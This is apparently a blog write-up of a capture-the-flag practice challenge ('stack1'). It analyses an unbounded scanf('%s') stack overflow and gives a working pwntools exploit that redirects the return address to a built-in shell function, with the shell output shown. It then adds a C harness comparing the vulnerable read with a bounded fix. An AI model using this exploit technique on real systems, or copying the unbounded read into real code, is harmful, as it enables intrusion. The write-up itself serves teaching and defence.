Syclover Pwn practice problems

stack1

ios@ubuntu:~$ checksec stack1
[*] '/home/ios/stack1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
ios@ubuntu:~$

NX protection is enabled, but there is no stack canary and no PIE, so the addresses in the binary are fixed.
Load the binary into IDA and look at the decompiled code.
main()

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-20h]

  puts("get input");
  scanf("%s", &v4);
  return 0;
}

get_shell()

int get_shell()
{
  return system("/bin/sh");
}

A simple stack overflow: scanf("%s") reads into v4 without any length limit, and a function that spawns a shell is already present in the binary, so after overwriting v4 (0x20 bytes) and the saved rbp (8 bytes) we only need the return address to point at get_shell.
exp

from pwn import *

p = process('./stack1')
sys_addr = 0x4005B6  # address of get_shell(); fixed because the binary has no PIE
# v4 lives at rbp-0x20: 0x20 bytes fill the buffer, 8 more overwrite the saved rbp,
# and the next 8 bytes replace the saved return address with get_shell().
# Bytes literals keep the script working under both Python 2 and Python 3.
payload = b'A' * 0x20 + b'b' * 8 + p64(sys_addr)
p.sendline(payload)
p.interactive()

Shell obtained successfully:

ios@ubuntu:~$ python stack1.py
[+] Starting local process './stack1': pid 2228
[*] Switching to interactive mode
get input
$ ls
flag
$ 
[*] Interrupted
[*] Stopped process './stack1' (pid 2228)
ios@ubuntu:~$
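The root cause is the unbounded "%s" conversion in main(). The following is an added example, not part of the original writeup or of the challenge binary: it places the vulnerable pattern beside a bounded version and measures how many bytes each one writes past a 32-byte buffer (the size of v4). sscanf on a constructed string stands in for scanf on stdin, and the oversized arena is an assumption of the test harness so that the overflow can be observed without undefined behaviour.

```c
#include <stdio.h>
#include <string.h>

/* Size of the stack buffer in the writeup: v4 sits at rbp-0x20, so 32 bytes
   separate it from the saved rbp and 40 bytes from the return address. */
#define BUF_SIZE 32

/* Vulnerable pattern (as in stack1's main): "%s" carries no width, so the
   conversion writes as many bytes as the input holds. src stands in for
   stdin here so the behaviour can be observed on an oversized arena. */
int vulnerable_read(const char *src, char *dst)
{
    return sscanf(src, "%s", dst);
}

/* Hardened form: a width of BUF_SIZE-1 leaves room for the NUL, and the
   width is generated from BUF_SIZE so it cannot drift from the declaration. */
int hardened_read(const char *src, char *dst)
{
    char fmt[16];
    snprintf(fmt, sizeof fmt, "%%%ds", BUF_SIZE - 1);   /* yields "%31s" */
    return sscanf(src, fmt, dst);
}

/* Feeds `len` non-space characters to `reader` and returns how many bytes it
   touched beyond BUF_SIZE. 0 means the reader stayed inside the buffer. */
size_t bytes_written_past_buffer(int (*reader)(const char *, char *), size_t len)
{
    char input[256];
    char arena[256];   /* far larger than BUF_SIZE so the overflow is visible, not UB */
    if (len >= sizeof input)
        len = sizeof input - 1;
    memset(input, 'A', len);
    input[len] = '\0';
    memset(arena, 'X', sizeof arena);
    reader(input, arena);
    size_t past = 0;
    for (size_t i = BUF_SIZE; i < sizeof arena; i++)
        if (arena[i] != 'X')
            past++;
    return past;
}

int main(void)
{
    printf("vulnerable: %zu bytes past the buffer\n", bytes_written_past_buffer(vulnerable_read, 60));
    printf("hardened:   %zu bytes past the buffer\n", bytes_written_past_buffer(hardened_read, 60));
    return 0;
}
```

With a 60-byte input the unbounded read spills 29 bytes (28 'A's plus the terminating NUL) past the buffer, which is more than enough to reach the saved rbp and return address; the bounded read spills none.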
Author: ios
Copyright notice: this article was first published on ios's blog; please credit the source when reposting.